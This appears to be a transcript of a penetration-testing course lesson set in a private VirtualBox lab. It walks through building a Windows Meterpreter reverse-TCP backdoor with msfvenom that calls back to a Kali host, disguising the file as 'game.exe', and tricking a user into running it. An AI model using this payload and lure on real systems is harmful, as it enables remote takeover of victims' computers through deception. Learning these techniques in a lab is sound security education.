Alright, in the previous lesson we installed the VBox guest editions so that we'd be able to copy and paste easily. That's going to be pretty important. It sounds like a small thing, but it'll save a lot of writing things down and retyping them. When we hack from our Kali Linux box into a Windows 7, we saw that Windows 7 is on almost half of the desktops worldwide still, even though we're 2 versions away from that currently. And we're going to use Metasploit, the framework that comes with our Kali Linux setup, so that we can hack into that Windows 7 computer using one of the most powerful frameworks for system vulnerability testing and penetration testing, Metasploit. So first of all, we've got both of our machines open. I'm going to go to full screen for Kali so that you'll be able to see this better. And we're going to start the Metasploit framework. You can find that here on the left-hand bar, or you can come under Applications, Exploitation Tools, Metasploit. Either one of those will open it up. And I'm going to open a second terminal window. You notice that this is terminal driven. I'm going to start the PostgreSQL database service so that we can search things really quickly. So we'll say service PostgreSQL start. We've got our database up and running. And just as a reality check, ifconfig, that tells us that we are on 10.0.3.5. Your address may be slightly different. If you started your Windows box after your Kali Linux box on this private network, you may have picked up a different address. I am 10.0.3.5. That's going to be very important for a lot of our exploits here. So the first thing we've done is run our Metasploit console, and this is MSF, the Metasploit framework console, and you can see that I have a prompt down here for MSF. I'm going to start MSVenom, and I'm going to create a payload that's going to be an executable file that I'll be able to run from my Windows computer. And I'm going to serve that up on a web server on this Kali Linux box. This is somewhat similar to when we used the social engineering toolkit back in section 5 to fool someone into downloading a file, or fool someone into entering their user credentials into a fake Facebook page. We're going to fool someone into downloading something that looks like a game, but actually gives us a backdoor into control their computer as an administrator. So the command that we want to run is msfvenom, and you'll see why this is named Venom once we use it. And actually, I'm going to make that a little bigger and clear the screen. Now, msfvenom. And we want to specify a payload that we're going to deliver to our Windows 7 box. And that payload is going to be a very powerful tool called Meterpreter. Meterpreter comes with the Metasploit framework, and it allows us to set up an interpreter or a running shell that lets us communicate to that Windows 7 box, and we'll be able to eventually take it over as an administrator. So our msfvenom gets followed by -p for payload. Windows /meterpreter /reverse_TCP. That's going to establish a reverse TCP connection. In other words, the Windows 7 box is going to call us. It's going to call the Kali Linux machine using TCP, or the transmission control protocol, just the regular TCP IP that the World Wide Web uses to communicate. So we're going to establish a connection from that Windows 7 box back to our Kali Linux box. Well, we need to tell it the host address of the Kali Linux box. So we'll say lhost equals, and we need that IP address 10.0.3.5, so we can even copy it and come up here and paste. That way we make sure we get it exactly right. Minus 10.0.3.5, make sure you match whatever your ifconfig says. Next, we tell it the format that we want to export this payload, and that is going to be -f, and it's going to be an exe file, or an executable file for Windows, -f space exe. This is going to wrap a line, but you can see how it works there. And now we need to tell it the name of the file and where we want to store that as an output file. So this is going to create a payload or an executable file that we're going to run on our Windows 7 computer. And I'll output that to /root/desktop/ and let's call it game.exe. So this is going to look like a game that we're tricking someone into downloading and running on their Windows 7 computer. And once you run that, if you've put the output location as root desktop game.exe, if we pull this down now, we see game.exe is here on the Kali Linux desktop. So this has created a Windows executable. Notice an x86 Windows platform executable that's in the executable format or exe format called game.exe. So we have our payload ready to go. In the next lesson, we're going to see how to put this up on a temporary web page that we're going to set up on this Kali Linux box so that we can exploit it and run it on our Windows 7 computer. We'll see how to set up the exploit website in the next lesson.